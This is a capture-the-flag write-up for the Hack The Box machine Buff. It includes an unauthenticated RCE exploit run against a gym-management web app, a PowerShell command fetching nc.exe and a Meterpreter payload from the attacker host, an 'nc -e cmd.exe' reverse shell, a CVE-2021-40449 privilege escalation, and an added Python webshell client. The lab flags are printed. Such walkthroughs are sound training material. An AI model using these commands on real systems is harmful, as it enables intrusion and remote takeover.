HTB:Buff[WriteUP]
USER_FLAG:ee3335d18df442d891d4f629540a840f
ROOT_FLAG:3a40c65e8215ee8b7d6c9b321eec287f
Connect to the HTB VPN and spawn the target machine
Target IP: 10.10.10.198
Attacker IP (assigned by the VPN): 10.10.16.7
Information Gathering
Scan the full TCP port range on the target with rustscan
rustscan -a 10.10.10.198 -r 1-65535 --ulimit 5000
Run nmap's default scripts and service/version detection against the open ports
nmap -p 7680,8080 -sCV 10.10.10.198
Probe each of the two open ports with curl. Port 7680 returns no HTTP response at all, so the web application on 8080 is the only lead; the Server header there shows XAMPP (Apache 2.4.43 on Win64 with PHP 7.4.6)
curl -I http://10.10.10.198:7680
curl -I http://10.10.10.198:8080
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.10.198:7680
curl: (52) Empty reply from server
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.10.198:8080
HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 00:52:37 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Set-Cookie: sec_session_id=dum0rt5r6s2o7ksbai0g2rvhua; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: sec_session_id=tkr1qpofbvg8f3frujuksp9u0n; path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
Open the site on port 8080 in a browser
Clicking Contact reveals the application's name at the left of the page: Gym Management System 1.0
Exploitation
Search for that application with searchsploit
searchsploit Gym Management
Copy the unauthenticated RCE exploit from the results into the current directory
searchsploit -m 48506.py
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 48506.py
Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
URL: https://www.exploit-db.com/exploits/48506
Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/48506.py
Run the exploit with python2 to get a shell (the script is Python 2 code, hence the deprecation warning from the bundled cryptography wheel)
python2 48506.py 'http://10.10.10.198:8080/'
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python2 48506.py 'http://10.10.10.198:8080/'
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
            /\
/vvvvvvvvvvvv \--------------------------------------,
 `^^^^^^^^^^^^ /============BOKU====================="
            \/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
buff\shaun
Once inside, though, this shell cannot change directory and most interactive commands do not behave. The cause is how the exploit gets execution: it uploads a PHP webshell (with a PNG signature prepended to pass the upload check) into C:\xampp\htdocs\gym\upload and then sends every command as a separate HTTP request, each run in a fresh process. A cd therefore never carries over to the next command, and the PNG bytes that sit in front of the PHP code are echoed back ahead of every command's output, which is the "PNG" printed before buff\shaun above.
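The following is an added example for this write-up; it is not code from the original post and not the exploit's own code. It wraps a one-shot webshell of this kind so that cd persists (the client tracks the working directory and prefixes every command with a cd to it), captures cmd.exe's stderr, and strips the PNG signature from each response. WEBSHELL_URL and CMD_PARAM are assumptions and should be checked against 48506.py; fake_target and SAMPLE_TREE are constructed stand-ins for the target so the script runs offline.

```python
"""Stateful client for the one-shot PHP webshell that exploit 48506 leaves behind.

Added example for this write-up, not code from the original post or from the
exploit. The webshell runs every request in a fresh cmd.exe, so "cd" never
persists, stderr is lost, and the PNG signature prepended to the .php file is
echoed before each response. This client keeps the working directory itself,
sends each command as (cd /d <cwd> && <cmd>) 2>&1, and strips the PNG bytes.
WEBSHELL_URL and CMD_PARAM are assumptions: check them in 48506.py.
"""
import re
import urllib.parse
import urllib.request

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"  # standard 8-byte PNG signature
WEBSHELL_URL = "http://10.10.10.198:8080/upload/kamehameha.php"  # assumption
CMD_PARAM = "telepathy"  # assumption: GET parameter carrying the command
WIN_ABS_PATH = re.compile(r"^[A-Za-z]:\\")


def clean_output(raw: bytes) -> str:
    """Drop the PNG signature (if present) and decode what the shell printed."""
    if raw.startswith(PNG_MAGIC):
        raw = raw[len(PNG_MAGIC):]
    return raw.decode("utf-8", errors="replace")


def http_transport(url: str = WEBSHELL_URL, param: str = CMD_PARAM):
    def send(command: str) -> bytes:  # one command per GET request, body back
        query = urllib.parse.urlencode({param: command})
        with urllib.request.urlopen(f"{url}?{query}", timeout=30) as resp:
            return resp.read()
    return send


class StatefulWebShell:
    """Emulates a persistent working directory on top of one-shot commands."""

    def __init__(self, transport, cwd: str = ""):
        self.transport = transport
        # A bare "cd" makes cmd.exe print the directory the webshell starts in.
        self.cwd = cwd or clean_output(transport("cd")).strip()

    def _exec(self, command: str) -> str:
        # "cd /d" also switches drive letters; the group redirect keeps stderr.
        return clean_output(self.transport(f'(cd /d "{self.cwd}" && {command}) 2>&1'))

    def run(self, command: str) -> str:
        m = re.match(r"^\s*cd\s+(?:/d\s+)?(.+?)\s*$", command, re.IGNORECASE)
        if m:  # let the target resolve the path so ".." and relatives work
            target = m.group(1).strip('"')
            out = self._exec(f'cd /d "{target}" && cd')
            if WIN_ABS_PATH.match(out.strip()):
                self.cwd = out.strip()
                return ""
            return out  # cmd.exe's error text, e.g. path not found
        return self._exec(command)


def fake_target(tree: dict):
    """Constructed stand-in for the box (offline): a tiny cmd.exe emulator that,
    like the real webshell, restarts in the upload directory on every call."""
    def send(command: str) -> bytes:
        body = command.strip()
        if body.startswith("(") and body.endswith(") 2>&1"):
            body = body[1:-6]
        cwd, lines = "C:\\xampp\\htdocs\\gym\\upload", []
        for step in (s.strip() for s in body.split("&&")):
            m = re.match(r"^cd(?:\s+/d)?(?:\s+(.*))?$", step, re.IGNORECASE)
            if m:  # absolute directories only; real cmd.exe resolves relatives
                target = (m.group(1) or "").strip('"')
                if not target:
                    lines.append(cwd)
                elif target in tree:
                    cwd = target
                else:
                    lines.append("The system cannot find the path specified.")
                    break
            elif step.lower() == "whoami":
                lines.append("buff\\shaun")
            elif step.lower().startswith("type "):
                name = step[5:].strip()
                lines.append(tree[cwd].get(name, "The system cannot find the file specified."))
        return PNG_MAGIC + "\r\n".join(lines).encode()
    return send


SAMPLE_TREE = {  # constructed; the two directories the write-up visits
    "C:\\xampp\\htdocs\\gym\\upload": {},
    "C:\\Users\\shaun\\Desktop": {"user.txt": "ee3335d18df442d891d4f629540a840f"},
}


def demo(transport=None) -> dict:
    """Replay the session the write-up does by hand and return what it saw."""
    shell = StatefulWebShell(transport or fake_target(SAMPLE_TREE))
    seen = {"start": shell.cwd, "whoami": shell.run("whoami").strip()}
    shell.run("cd C:\\Users\\shaun\\Desktop")
    seen["cwd"] = shell.cwd
    seen["flag"] = shell.run("type user.txt").strip()
    seen["bad_cd"] = shell.run("cd C:\\does_not_exist").strip()
    seen["cwd_after_bad_cd"] = shell.cwd
    return seen


if __name__ == "__main__":
    # Offline against the constructed target; pass http_transport() for the box.
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Against the real target, build `StatefulWebShell(http_transport())`, loop over `input()` and print `run()`'s result, using `shell.cwd` as the prompt. The `2>&1` inside the group matters: shell_exec only returns stdout, so without it a failed cd would come back empty and look like success.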
Next, upload a netcat binary to the target. First start an HTTP server on the attack machine in a directory that contains nc.exe
python -m http.server 6666
From the webshell, download nc.exe on the target. DownloadFile returns nothing, so it is called directly rather than through IEX. The file lands in the webshell's working directory, C:\xampp\htdocs\gym\upload, which is inside the web root
powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.16.7:6666/nc.exe','nc.exe')"
Start a nc listener on the attack machine
nc -lvnp 1425
From the webshell, launch the reverse shell back to the attack machine (the HTTP request stays open for as long as the shell lives)
nc -e cmd.exe 10.10.16.7 1425
The local nc receives the connection
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.198] 49776
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun
Locate user.txt and read it
C:\xampp\htdocs\gym\upload>cd C:\
cd C:\

C:\>dir /s user.txt
dir /s user.txt
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Desktop

21/11/2024  00:38                34 user.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)   9,804,349,440 bytes free

C:\>type C:\Users\shaun\Desktop\user.txt
type C:\Users\shaun\Desktop\user.txt
ee3335d18df442d891d4f629540a840f
USER_FLAG:ee3335d18df442d891d4f629540a840f
Privilege Escalation
On the attack machine, generate a stageless x64 Meterpreter reverse-TCP executable with msfvenom
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f exe > shell.exe
Start the HTTP server again with python
python -m http.server 6666
Download the payload on the target, the same way as nc.exe
powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.16.7:6666/shell.exe','shell.exe')"
Start Metasploit
msfconsole
Use the generic handler module
use exploit/multi/handler
Set PAYLOAD to windows/x64/meterpreter_reverse_tcp (it must match the msfvenom payload exactly: a staged meterpreter/reverse_tcp handler will not catch this stageless executable), LHOST to 10.10.16.7 and LPORT to 4444
Run shell.exe on the target from the reverse shell; the handler catches the session
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.7:4444
[*] Meterpreter session 1 opened (10.10.16.7:4444 -> 10.10.10.198:49782) at 2024-11-21 01:15:49 -0500

meterpreter > getuid
Server username: BUFF\shaun
Background the session
background
Switch to the local exploit suggester module
use post/multi/recon/local_exploit_suggester
Set SESSION to 1 and run it
Switch to the suggested privilege escalation module, a kernel exploit for CVE-2021-40449 (the Win32k NtGdiResetDC use-after-free). Being a kernel exploit, it can crash the target if it fails, so keep the reverse shell from earlier as a fallback
use exploit/windows/local/cve_2021_40449
Set SESSION to 1, PAYLOAD to an x64 Meterpreter reverse-TCP payload, LHOST to 10.10.16.7 and LPORT to 4545 (a port other than 4444, which the first handler is still using)
msf6 exploit(windows/local/cve_2021_40449) > exploit

[*] Started reverse TCP handler on 10.10.16.7:4545
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1803 build detected!
[*] Launching netsh to host the DLL...
[+] Process 7264 launched.
[*] Reflectively injecting the DLL into 7264...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (10.10.16.7:4545 -> 10.10.10.198:49784) at 2024-11-21 01:25:57 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Drop to a command prompt
shell
Locate root.txt and read it
meterpreter > shell
Process 6576 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>dir /s root.txt
dir /s root.txt
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\Administrator\Desktop

21/11/2024  00:38                34 root.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)   9,801,760,768 bytes free

C:\>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
3a40c65e8215ee8b7d6c9b321eec287f
ROOT_FLAG:3a40c65e8215ee8b7d6c9b321eec287f
Original article: https://blog.csdn.net/qq_43007452/article/details/143931431